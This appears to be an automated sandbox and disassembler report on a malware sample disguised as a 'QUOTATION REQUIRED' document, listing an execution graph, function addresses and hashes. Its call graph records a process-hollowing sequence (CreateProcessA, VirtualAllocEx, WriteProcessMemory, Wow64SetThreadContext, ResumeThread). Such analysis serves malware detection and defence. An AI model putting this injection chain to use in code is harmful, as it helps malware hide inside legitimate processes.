                                                                                                                                              execution_graph 59049 24d4668 59050 24d467a 59049->59050 59051 24d4686 59050->59051 59053 24d4779 59050->59053 59054 24d479d 59053->59054 59058 24d4879 59054->59058 59062 24d4888 59054->59062 59060 24d48af 59058->59060 59059 24d498c 59059->59059 59060->59059 59066 24d4514 59060->59066 59063 24d48af 59062->59063 59064 24d498c 59063->59064 59065 24d4514 CreateActCtxA 59063->59065 59065->59064 59067 24d5918 CreateActCtxA 59066->59067 59069 24d59db 59067->59069 59077 24dd4f8 59078 24dd53e 59077->59078 59082 24dd6d8 59078->59082 59085 24dd6c7 59078->59085 59079 24dd62b 59084 24dd706 59082->59084 59088 24dcde0 59082->59088 59084->59079 59086 24dcde0 DuplicateHandle 59085->59086 59087 24dd706 59086->59087 59087->59079 59089 24dd740 DuplicateHandle 59088->59089 59090 24dd7d6 59089->59090 59090->59084 59091 24db178 59092 24db187 59091->59092 59094 24db261 59091->59094 59095 24db2a4 59094->59095 59096 24db281 59094->59096 59095->59092 59096->59095 59097 24db4a8 GetModuleHandleW 59096->59097 59098 24db4d5 59097->59098 59098->59092 59070 6d0f578 59071 6d0f703 59070->59071 59073 6d0f59e 59070->59073 59073->59071 59074 6d07c28 59073->59074 59075 6d0f7f8 PostMessageW 59074->59075 59076 6d0f864 59075->59076 59076->59073 59262 7631038 59263 7631057 59262->59263 59266 7631060 59262->59266 59270 7631070 59262->59270 59267 7631065 59266->59267 59274 76314b8 59267->59274 59268 763109e 59268->59263 59271 7631079 59270->59271 59273 76314b8 DrawTextExW 59271->59273 59272 763109e 59272->59263 59273->59272 59275 76314e2 59274->59275 59276 76314f3 59274->59276 59275->59268 59276->59275 59279 76317e0 59276->59279 59284 76317d0 59276->59284 59280 7631808 59279->59280 59281 763190e 59280->59281 59289 7631fb0 59280->59289 59294 7631f9f 59280->59294 59281->59275 59285 76317e0 59284->59285 59286 763190e 59285->59286 59287 7631fb0 DrawTextExW 59285->59287 59288 7631f9f DrawTextExW 59285->59288 59286->59275 59287->59286 59288->59286 59290 7631fc6 59289->59290 59299 7632408 59290->59299 59304 7632418 59290->59304 59291 763203c 59291->59281 59295 7631fb0 59294->59295 59297 7632408 DrawTextExW 59295->59297 59298 7632418 DrawTextExW 59295->59298 59296 763203c 59296->59281 59297->59296 59298->59296 59300 7632418 59299->59300 59308 763244b 59300->59308 59315 7632458 59300->59315 59301 7632436 59301->59291 59306 763244b DrawTextExW 59304->59306 59307 7632458 DrawTextExW 59304->59307 59305 7632436 59305->59291 59306->59305 59307->59305 59309 76324b6 59308->59309 59310 7632452 59308->59310 59309->59301 59310->59309 59322 76324c8 59310->59322 59327 7632580 59310->59327 59332 76325dc 59310->59332 59338 76324d8 59310->59338 59317 7632489 59315->59317 59316 76324b6 59316->59301 59317->59316 59318 7632580 DrawTextExW 59317->59318 59319 76324c8 DrawTextExW 59317->59319 59320 76324d8 DrawTextExW 59317->59320 59321 76325dc DrawTextExW 59317->59321 59318->59316 59319->59316 59320->59316 59321->59316 59325 76324f9 59322->59325 59324 7632580 DrawTextExW 59324->59325 59325->59324 59326 763250e 59325->59326 59343 763139c 59325->59343 59326->59309 59329 763252c 59327->59329 59328 76325a3 59328->59309 59329->59328 59330 7632580 DrawTextExW 59329->59330 59331 763139c DrawTextExW 59329->59331 59330->59327 59331->59329 59333 76325ea 59332->59333 59335 763252c 59332->59335 59334 76325a3 59334->59309 59335->59334 59336 7632580 DrawTextExW 59335->59336 59337 763139c DrawTextExW 59335->59337 59336->59335 59337->59335 59341 76324f9 59338->59341 59339 763139c DrawTextExW 59339->59341 59340 7632580 DrawTextExW 59340->59341 59341->59339 59341->59340 59342 763250e 59341->59342 59342->59309 59345 76313a7 59343->59345 59344 76343c9 59344->59325 59345->59344 59349 7634f40 59345->59349 59352 7634f30 59345->59352 59346 76344dc 59346->59325 59356 7633f14 59349->59356 59353 7634f40 59352->59353 59354 7633f14 DrawTextExW 59353->59354 59355 7634f5d 59354->59355 59355->59346 59357 7634f78 DrawTextExW 59356->59357 59359 7634f5d 59357->59359 59359->59346 59360 4d395a8 59363 4d396d8 59360->59363 59364 4d396f9 59363->59364 59368 4d39730 59364->59368 59376 4d39720 59364->59376 59365 4d395c4 59369 4d39753 59368->59369 59370 4d39757 59369->59370 59384 4d39df1 59369->59384 59389 7638650 59369->59389 59393 4d39e00 59369->59393 59398 7638641 59369->59398 59370->59365 59371 4d397f5 59377 4d39730 59376->59377 59378 4d39757 59377->59378 59380 4d39df1 DrawTextExW 59377->59380 59381 7638641 DrawTextExW 59377->59381 59382 4d39e00 DrawTextExW 59377->59382 59383 7638650 DrawTextExW 59377->59383 59378->59365 59379 4d397f5 59380->59379 59381->59379 59382->59379 59383->59379 59385 4d39dfa 59384->59385 59386 4d39e92 59385->59386 59407 4d39fb8 59385->59407 59413 4d39fa8 59385->59413 59386->59371 59391 7638676 59389->59391 59447 763873f 59391->59447 59394 4d39e07 59393->59394 59395 4d39e92 59394->59395 59396 4d39fb8 DrawTextExW 59394->59396 59397 4d39fa8 DrawTextExW 59394->59397 59395->59371 59396->59395 59397->59395 59399 76385e8 59398->59399 59403 763864a 59398->59403 59401 763861f 59399->59401 59405 4d39730 DrawTextExW 59399->59405 59406 4d39720 DrawTextExW 59399->59406 59400 763860c 59400->59371 59401->59371 59402 7638704 59402->59371 59404 763873f DrawTextExW 59403->59404 59404->59402 59405->59400 59406->59400 59408 4d39fcb 59407->59408 59409 4d39fcf 59408->59409 59419 4d3a069 59408->59419 59424 4d3a078 59408->59424 59409->59386 59410 4d3a05a 59410->59386 59415 4d39fb8 59413->59415 59414 4d39fcf 59414->59386 59415->59414 59417 4d3a069 DrawTextExW 59415->59417 59418 4d3a078 DrawTextExW 59415->59418 59416 4d3a05a 59416->59386 59417->59416 59418->59416 59420 4d3a09e 59419->59420 59421 4d3a0c7 59420->59421 59429 763931b 59420->59429 59434 7639328 59420->59434 59421->59410 59425 4d3a09e 59424->59425 59426 4d3a0c7 59425->59426 59427 763931b DrawTextExW 59425->59427 59428 7639328 DrawTextExW 59425->59428 59426->59410 59427->59426 59428->59426 59430 7639328 59429->59430 59431 76394cd 59430->59431 59439 76394e8 59430->59439 59443 76394d8 59430->59443 59431->59421 59436 7639347 59434->59436 59435 76394cd 59435->59421 59436->59435 59437 76394e8 DrawTextExW 59436->59437 59438 76394d8 DrawTextExW 59436->59438 59437->59436 59438->59436 59440 76394f1 59439->59440 59441 76314b8 DrawTextExW 59440->59441 59442 7639515 59441->59442 59442->59430 59444 76394e8 59443->59444 59445 76314b8 DrawTextExW 59444->59445 59446 7639515 59445->59446 59446->59430 59448 7638766 59447->59448 59450 4d39df1 DrawTextExW 59448->59450 59451 4d39e00 DrawTextExW 59448->59451 59449 7638704 59449->59371 59450->59449 59451->59449 59099 6d0b91d 59101 6d0b8f1 59099->59101 59100 6d0b8d3 59101->59100 59105 6d0e34e 59101->59105 59120 6d0e2e8 59101->59120 59134 6d0e2d8 59101->59134 59106 6d0e2dc 59105->59106 59107 6d0e351 59105->59107 59110 6d0e30a 59106->59110 59148 6d0e990 59106->59148 59153 6d0ebaa 59106->59153 59158 6d0e8a9 59106->59158 59164 6d0e7d8 59106->59164 59169 6d0eb75 59106->59169 59174 6d0ea54 59106->59174 59179 6d0edf3 59106->59179 59183 6d0e922 59106->59183 59188 6d0efc2 59106->59188 59192 6d0ec52 59106->59192 59199 6d0e8e1 59106->59199 59107->59100 59110->59100 59121 6d0e302 59120->59121 59122 6d0e990 2 API calls 59121->59122 59123 6d0e8e1 2 API calls 59121->59123 59124 6d0e30a 59121->59124 59125 6d0ec52 4 API calls 59121->59125 59126 6d0efc2 2 API calls 59121->59126 59127 6d0e922 2 API calls 59121->59127 59128 6d0edf3 2 API calls 59121->59128 59129 6d0ea54 2 API calls 59121->59129 59130 6d0eb75 2 API calls 59121->59130 59131 6d0e7d8 2 API calls 59121->59131 59132 6d0e8a9 2 API calls 59121->59132 59133 6d0ebaa 2 API calls 59121->59133 59122->59124 59123->59124 59124->59100 59125->59124 59126->59124 59127->59124 59128->59124 59129->59124 59130->59124 59131->59124 59132->59124 59133->59124 59135 6d0e2dc 59134->59135 59136 6d0e30a 59135->59136 59137 6d0e990 2 API calls 59135->59137 59138 6d0e8e1 2 API calls 59135->59138 59139 6d0ec52 4 API calls 59135->59139 59140 6d0efc2 2 API calls 59135->59140 59141 6d0e922 2 API calls 59135->59141 59142 6d0edf3 2 API calls 59135->59142 59143 6d0ea54 2 API calls 59135->59143 59144 6d0eb75 2 API calls 59135->59144 59145 6d0e7d8 2 API calls 59135->59145 59146 6d0e8a9 2 API calls 59135->59146 59147 6d0ebaa 2 API calls 59135->59147 59136->59100 59137->59136 59138->59136 59139->59136 59140->59136 59141->59136 59142->59136 59143->59136 59144->59136 59145->59136 59146->59136 59147->59136 59149 6d0e996 59148->59149 59204 6d0af68 59149->59204 59208 6d0af61 59149->59208 59150 6d0e9c8 59150->59110 59154 6d0ef22 59153->59154 59212 6d0a8e1 59154->59212 59216 6d0a8e8 59154->59216 59155 6d0ef4e 59159 6d0e9a7 59158->59159 59160 6d0ed7d 59159->59160 59162 6d0af61 WriteProcessMemory 59159->59162 59163 6d0af68 WriteProcessMemory 59159->59163 59160->59110 59161 6d0e9c8 59161->59110 59162->59161 59163->59161 59165 6d0e7e2 59164->59165 59220 6d0b1e4 59165->59220 59224 6d0b1f0 59165->59224 59170 6d0ecf2 59169->59170 59228 6d0f3b8 59170->59228 59233 6d0f3a8 59170->59233 59171 6d0ed0e 59175 6d0ea5a 59174->59175 59176 6d0ea80 59175->59176 59246 6d0b053 59175->59246 59250 6d0b058 59175->59250 59176->59110 59181 6d0af61 WriteProcessMemory 59179->59181 59182 6d0af68 WriteProcessMemory 59179->59182 59180 6d0ee21 59181->59180 59182->59180 59184 6d0ed23 59183->59184 59254 6d0a991 59184->59254 59258 6d0a998 59184->59258 59185 6d0ed3e 59185->59110 59190 6d0af61 WriteProcessMemory 59188->59190 59191 6d0af68 WriteProcessMemory 59188->59191 59189 6d0efe9 59190->59189 59191->59189 59195 6d0a991 Wow64SetThreadContext 59192->59195 59196 6d0a998 Wow64SetThreadContext 59192->59196 59193 6d0e88c 59194 6d0e8c3 59193->59194 59197 6d0b053 ReadProcessMemory 59193->59197 59198 6d0b058 ReadProcessMemory 59193->59198 59194->59110 59195->59193 59196->59193 59197->59194 59198->59194 59200 6d0e8e5 59199->59200 59202 6d0b053 ReadProcessMemory 59200->59202 59203 6d0b058 ReadProcessMemory 59200->59203 59201 6d0ea80 59201->59110 59202->59201 59203->59201 59205 6d0afb0 WriteProcessMemory 59204->59205 59207 6d0b007 59205->59207 59207->59150 59209 6d0af68 WriteProcessMemory 59208->59209 59211 6d0b007 59209->59211 59211->59150 59213 6d0a8e8 ResumeThread 59212->59213 59215 6d0a959 59213->59215 59215->59155 59217 6d0a928 ResumeThread 59216->59217 59219 6d0a959 59217->59219 59219->59155 59221 6d0b1ea CreateProcessA 59220->59221 59223 6d0b43b 59221->59223 59225 6d0b279 CreateProcessA 59224->59225 59227 6d0b43b 59225->59227 59229 6d0f3cd 59228->59229 59238 6d0aea8 59229->59238 59242 6d0aea0 59229->59242 59230 6d0f3ec 59230->59171 59234 6d0f3b8 59233->59234 59236 6d0aea0 VirtualAllocEx 59234->59236 59237 6d0aea8 VirtualAllocEx 59234->59237 59235 6d0f3ec 59235->59171 59236->59235 59237->59235 59239 6d0aee8 VirtualAllocEx 59238->59239 59241 6d0af25 59239->59241 59241->59230 59243 6d0aea8 VirtualAllocEx 59242->59243 59245 6d0af25 59243->59245 59245->59230 59247 6d0b0a3 ReadProcessMemory 59246->59247 59249 6d0b0e7 59247->59249 59249->59176 59251 6d0b0a3 ReadProcessMemory 59250->59251 59253 6d0b0e7 59251->59253 59253->59176 59255 6d0a998 Wow64SetThreadContext 59254->59255 59257 6d0aa25 59255->59257 59257->59185 59259 6d0a9dd Wow64SetThreadContext 59258->59259 59261 6d0aa25 59259->59261 59261->59185

                                                                                                                                              Executed Functions

                                                                                                                                              Function 08970006 Relevance: 4.6, Instructions: 4582COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 8970006-897000b 1 897000c-8970038 0->1 1->1 2 897003a-897006b 1->2 4 8970072-8970c98 2->4 5 897006d 2->5 195 8970ca3-8970ca9 4->195 5->4 196 8970cb5-8974668 195->196 606 8974692 196->606 607 897466a-8974676 196->607 608 8974698-8975007 606->608 609 8974680-8974686 607->609 610 8974678-897467e 607->610 611 8974690 609->611 610->611 611->608
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1b873c10e01e22168ec396af49b80a241969d71b87ff79375d8998bc29979e91
                                                                                                                                              • Instruction ID: 3e4bcb6c1b647f1310782e26b51e027e282ded87beb5715d951326f5fca3534f
                                                                                                                                              • Opcode Fuzzy Hash: 1b873c10e01e22168ec396af49b80a241969d71b87ff79375d8998bc29979e91
                                                                                                                                              • Instruction Fuzzy Hash: A8B3D534A116198FDB15EF64C894A99B3F2FF89304F1196E9D8486B361DB71AEC1CF80
                                                                                                                                              Function 08970040 Relevance: 4.6, Instructions: 4562COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 711 8970040-897006b 712 8970072-8970ca9 711->712 713 897006d 711->713 904 8970cb5-8974668 712->904 713->712 1314 8974692 904->1314 1315 897466a-8974676 904->1315 1316 8974698-8975007 1314->1316 1317 8974680-8974686 1315->1317 1318 8974678-897467e 1315->1318 1319 8974690 1317->1319 1318->1319 1319->1316
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8ba46b8e567a5e902393226235d7768257e94aff623d29754039cc88972aa8d0
                                                                                                                                              • Instruction ID: 90137fc69e33248e071ed39ca5bd8c4d553634421ffd8c1a8d6c9886ed7b396d
                                                                                                                                              • Opcode Fuzzy Hash: 8ba46b8e567a5e902393226235d7768257e94aff623d29754039cc88972aa8d0
                                                                                                                                              • Instruction Fuzzy Hash: 44B3E634A116198FDB15EF64C894A99B3F2FF89304F1196E9D8486B361DB71AEC1CF80
                                                                                                                                              Function 089756E8 Relevance: 3.4, Instructions: 3434COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1419 89756e8-8975713 1420 8975715 1419->1420 1421 897571a-8975c3f 1419->1421 1420->1421 1499 8975c5c-8975c75 1421->1499 1501 8975c77-8975c9d 1499->1501 1502 8975c9f-8975ca1 1499->1502 1503 8975ca4-8975caf 1501->1503 1502->1503 1505 8975c41-8975c4b 1503->1505 1506 8975cb1-8975d10 1503->1506 1963 8975c51 call 89796d0 1505->1963 1964 8975c51 call 89796e0 1505->1964 1965 8975c51 call 8979718 1505->1965 1959 8975d13 call 897a7b9 1506->1959 1960 8975d13 call 897a7c8 1506->1960 1507 8975c57-8975c5b 1507->1499 1512 8975d19-8975d5a 1966 8975d5d call 897a7b9 1512->1966 1967 8975d5d call 897a7c8 1512->1967 1515 8975d63-8975d7a 1517 8975d84-8975d8b 1515->1517 1518 8975d7c-8975d82 1515->1518 1520 8975d92-8975d95 1517->1520 1521 8975d8d 1517->1521 1519 8975d98-897604c 1518->1519 1961 8976052 call 897fcd9 1519->1961 1962 8976052 call 897fce8 1519->1962 1520->1519 1521->1520 1563 8976057-8978795 1851 8978797-89787a3 1563->1851 1852 89787bf 1563->1852 1854 89787a5-89787ab 1851->1854 1855 89787ad-89787b3 1851->1855 1853 89787c5-89792ba 1852->1853 1856 89787bd 1854->1856 1855->1856 1856->1853 1959->1512 1960->1512 1961->1563 1962->1563 1963->1507 1964->1507 1965->1507 1966->1515 1967->1515
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83862e7ec8b9da64c0604d9228befcd5041aa0d87b25bf8187c9dba88e803a27
                                                                                                                                              • Instruction ID: ee1941234dd6c8eb4c0ac0bf8a1ef95b5d94e84fbe8dbecb83434520ea912fa5
                                                                                                                                              • Opcode Fuzzy Hash: 83862e7ec8b9da64c0604d9228befcd5041aa0d87b25bf8187c9dba88e803a27
                                                                                                                                              • Instruction Fuzzy Hash: 5683D534A11619CFEB25EF64C894A99B3B2FF89304F1156E9D8096B361DB31AED1CF40
                                                                                                                                              Function 089756D9 Relevance: 3.4, Instructions: 3420COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1968 89756d9-8975713 1969 8975715 1968->1969 1970 897571a-8975c3f 1968->1970 1969->1970 2048 8975c5c-8975c75 1970->2048 2050 8975c77-8975c9d 2048->2050 2051 8975c9f-8975ca1 2048->2051 2052 8975ca4-8975caf 2050->2052 2051->2052 2054 8975c41-8975c4b 2052->2054 2055 8975cb1-8975cfc 2052->2055 2512 8975c51 call 89796d0 2054->2512 2513 8975c51 call 89796e0 2054->2513 2514 8975c51 call 8979718 2054->2514 2060 8975d04-8975d10 2055->2060 2056 8975c57-8975c5b 2056->2048 2508 8975d13 call 897a7b9 2060->2508 2509 8975d13 call 897a7c8 2060->2509 2061 8975d19-8975d47 2063 8975d4e-8975d5a 2061->2063 2515 8975d5d call 897a7b9 2063->2515 2516 8975d5d call 897a7c8 2063->2516 2064 8975d63-8975d7a 2066 8975d84-8975d8b 2064->2066 2067 8975d7c-8975d82 2064->2067 2069 8975d92-8975d95 2066->2069 2070 8975d8d 2066->2070 2068 8975d98-897603c 2067->2068 2111 8976046-897604c 2068->2111 2069->2068 2070->2069 2510 8976052 call 897fcd9 2111->2510 2511 8976052 call 897fce8 2111->2511 2112 8976057-8978795 2400 8978797-89787a3 2112->2400 2401 89787bf 2112->2401 2403 89787a5-89787ab 2400->2403 2404 89787ad-89787b3 2400->2404 2402 89787c5-89792ba 2401->2402 2405 89787bd 2403->2405 2404->2405 2405->2402 2508->2061 2509->2061 2510->2112 2511->2112 2512->2056 2513->2056 2514->2056 2515->2064 2516->2064
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fe270663fbb8e8eb3164fa1271445c94d6c3f1252ae0e7c97bf3a9cab295e672
                                                                                                                                              • Instruction ID: 9ac3aea8ec453a9e86ad8c310ce75560ebe484a4de659b923bf54732582d3631
                                                                                                                                              • Opcode Fuzzy Hash: fe270663fbb8e8eb3164fa1271445c94d6c3f1252ae0e7c97bf3a9cab295e672
                                                                                                                                              • Instruction Fuzzy Hash: 4083D634A11619CFEB25EF64C894A99B3B2FF89304F1156E9D8096B361DB31AED1CF40
                                                                                                                                              Function 0897EB20 Relevance: .8, Instructions: 790COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e06cd9ecbd3ebb20f48576407aac4cc5ea170b61dfb9073758fe18abbb123237
                                                                                                                                              • Instruction ID: 0f575ba8619a0f0707a3ee6ee90bfa3b081b15ba891baef11591d482b331a101
                                                                                                                                              • Opcode Fuzzy Hash: e06cd9ecbd3ebb20f48576407aac4cc5ea170b61dfb9073758fe18abbb123237
                                                                                                                                              • Instruction Fuzzy Hash: AC52A235B002148FCB19EF79D454A6E7BA6BF88706B1584ADE406EB3A1DF31DC42CB91
                                                                                                                                              Function 0897B468 Relevance: .7, Instructions: 723COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 21ee114322490b3eb6f7d506c225bfe43aea20c220283d2aa4c470f8ba20318e
                                                                                                                                              • Instruction ID: 0782b0a626872e9c77bb8aa2e8e81770fc88a8b12ec4854f99fdd45655c950c0
                                                                                                                                              • Opcode Fuzzy Hash: 21ee114322490b3eb6f7d506c225bfe43aea20c220283d2aa4c470f8ba20318e
                                                                                                                                              • Instruction Fuzzy Hash: 55528075B00219DFDB18EF69D488AAD77B6FF88725B158469E806DB360DB31EC01CB90
                                                                                                                                              Function 06D018C8 Relevance: .3, Instructions: 289COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0cdd58822ed7fa7e77b771284a828cba9e60c4aae75780d4f3a238480321c466
                                                                                                                                              • Instruction ID: ff0ac308f963144b88d26ac5a2d57ebbfb0f4da23cd9b6f92e142b8f457e0fe9
                                                                                                                                              • Opcode Fuzzy Hash: 0cdd58822ed7fa7e77b771284a828cba9e60c4aae75780d4f3a238480321c466
                                                                                                                                              • Instruction Fuzzy Hash: EFC1B074D04218CFEB64CFAAD844BADBBF2BF89300F14916AD459B7291DB349986CF50
                                                                                                                                              Function 06D018B9 Relevance: .3, Instructions: 277COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2c33d7a50291c014c91d6f9a75e8cc9c29384045fe61316c69a53deee3a70af8
                                                                                                                                              • Instruction ID: 0c50911d1510715acdd461ef321cb88b54b14eae80f001d39f85b154eda07bc3
                                                                                                                                              • Opcode Fuzzy Hash: 2c33d7a50291c014c91d6f9a75e8cc9c29384045fe61316c69a53deee3a70af8
                                                                                                                                              • Instruction Fuzzy Hash: 1BC1B274D05218CFEB64CFAAD8447ADFBF2BF89300F14816AD499A7291DB349985CF50
                                                                                                                                              Function 06D05529 Relevance: .1, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e94599eda288ffe311a63d809d8569fcc1d8d3a7ef25d9765b2c40ebbcc4d3d6
                                                                                                                                              • Instruction ID: a7f1c6f57ec589eb46aeeb0024ba7185fce1471dad073e8fd65406e17eddfece
                                                                                                                                              • Opcode Fuzzy Hash: e94599eda288ffe311a63d809d8569fcc1d8d3a7ef25d9765b2c40ebbcc4d3d6
                                                                                                                                              • Instruction Fuzzy Hash: 0C21E7B0D056189BEB58CFABD9447DEFBF7AFC9300F14C06AD448A6264DB7509458FA0
                                                                                                                                              Function 06D0E8F1 Relevance: .0, Instructions: 16COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2f907ac3b460696628758a5f00ff944e182714f18a28b7dc3cd1f000bcadc5fb
                                                                                                                                              • Instruction ID: 9c2dd697254278e480f48c09145b8be331fdbf2f985b028558249178f3276d5c
                                                                                                                                              • Opcode Fuzzy Hash: 2f907ac3b460696628758a5f00ff944e182714f18a28b7dc3cd1f000bcadc5fb
                                                                                                                                              • Instruction Fuzzy Hash: 3BD09EB4D49218CFE7A0DF60D444AB8B7B9AB5A300F007156D449F7291D730D940CF54
                                                                                                                                              Function 06D0B1E4 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 2517 6d0b1e4-6d0b285 2521 6d0b287-6d0b291 2517->2521 2522 6d0b2be-6d0b2de 2517->2522 2521->2522 2523 6d0b293-6d0b295 2521->2523 2529 6d0b2e0-6d0b2ea 2522->2529 2530 6d0b317-6d0b346 2522->2530 2524 6d0b297-6d0b2a1 2523->2524 2525 6d0b2b8-6d0b2bb 2523->2525 2527 6d0b2a3 2524->2527 2528 6d0b2a5-6d0b2b4 2524->2528 2525->2522 2527->2528 2528->2528 2531 6d0b2b6 2528->2531 2529->2530 2532 6d0b2ec-6d0b2ee 2529->2532 2538 6d0b348-6d0b352 2530->2538 2539 6d0b37f-6d0b439 CreateProcessA 2530->2539 2531->2525 2533 6d0b2f0-6d0b2fa 2532->2533 2534 6d0b311-6d0b314 2532->2534 2536 6d0b2fc 2533->2536 2537 6d0b2fe-6d0b30d 2533->2537 2534->2530 2536->2537 2537->2537 2540 6d0b30f 2537->2540 2538->2539 2541 6d0b354-6d0b356 2538->2541 2550 6d0b442-6d0b4c8 2539->2550 2551 6d0b43b-6d0b441 2539->2551 2540->2534 2543 6d0b358-6d0b362 2541->2543 2544 6d0b379-6d0b37c 2541->2544 2545 6d0b364 2543->2545 2546 6d0b366-6d0b375 2543->2546 2544->2539 2545->2546 2546->2546 2548 6d0b377 2546->2548 2548->2544 2561 6d0b4d8-6d0b4dc 2550->2561 2562 6d0b4ca-6d0b4ce 2550->2562 2551->2550 2564 6d0b4ec-6d0b4f0 2561->2564 2565 6d0b4de-6d0b4e2 2561->2565 2562->2561 2563 6d0b4d0 2562->2563 2563->2561 2566 6d0b500-6d0b504 2564->2566 2567 6d0b4f2-6d0b4f6 2564->2567 2565->2564 2568 6d0b4e4 2565->2568 2570 6d0b516-6d0b51d 2566->2570 2571 6d0b506-6d0b50c 2566->2571 2567->2566 2569 6d0b4f8 2567->2569 2568->2564 2569->2566 2572 6d0b534 2570->2572 2573 6d0b51f-6d0b52e 2570->2573 2571->2570 2575 6d0b535 2572->2575 2573->2572 2575->2575
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D0B426
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
